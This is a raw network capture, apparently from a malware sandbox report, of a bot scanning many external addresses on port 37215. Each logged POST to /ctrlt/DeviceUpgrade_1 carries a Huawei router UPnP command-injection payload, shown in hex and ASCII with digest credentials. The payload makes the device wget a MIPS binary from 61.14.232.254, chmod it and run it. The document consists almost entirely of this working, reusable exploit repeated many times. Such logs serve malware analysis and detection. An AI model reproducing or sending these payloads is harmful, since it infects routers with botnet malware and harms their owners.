6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  476192.168.2.1355108197.193.8.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.286413908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  477192.168.2.1359126197.101.83.23037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.286617041 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  478192.168.2.135599041.248.193.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.286638975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  479192.168.2.134446663.29.181.7337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.286674023 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  480192.168.2.135765041.186.56.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.286710024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  481192.168.2.133515871.230.210.8537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.286742926 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  482192.168.2.1346822197.145.44.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.286758900 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  483192.168.2.1357050197.9.26.237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.286906004 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  484192.168.2.1359164197.1.98.12337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.286925077 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  485192.168.2.134724041.45.248.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.286943913 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  486192.168.2.1348142166.233.141.18437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.286964893 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
